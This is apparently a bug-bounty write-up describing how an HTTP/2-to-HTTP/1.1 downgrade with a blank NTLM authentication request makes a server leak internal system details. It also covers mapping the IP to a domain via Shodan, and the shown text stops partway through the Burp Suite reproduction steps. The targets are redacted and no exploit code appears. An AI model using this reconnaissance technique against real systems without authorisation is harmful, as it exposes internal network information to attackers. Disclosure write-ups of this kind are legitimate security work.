NTLM Auth Disclosing Internal System Info via HTTP/2 to HTTP/1.1 Downgrade

Image created by Author using DALL-E 3

Summary

Internal information disclosure using hidden NTLM authentication.

Vulnerability Description

By downgrading the HTTP protocol from HTTP/2 to HTTP/1.1 at the endpoint https://x.x.x.x and sending the default NTLM hash value of blank username and password results into encoded NTLM hash in the server response, which we can decode using any NTLM Challenge decoder that leads to internal system information disclosure.

IP Verification

https://www.shodan.io/host/x.x.x.xCheck the domains associated with this IP using Shodan.Alternatively, just visit the IP via Chrome and it will display the associated domain in the “security certificate misconfiguration” error page.

Associated domain/subdomain: abc.redacted.com

Steps to Reproduce

Visit the endpoint “https://x.x.x.x"Proxy the request and send it to Burpsuite Repeater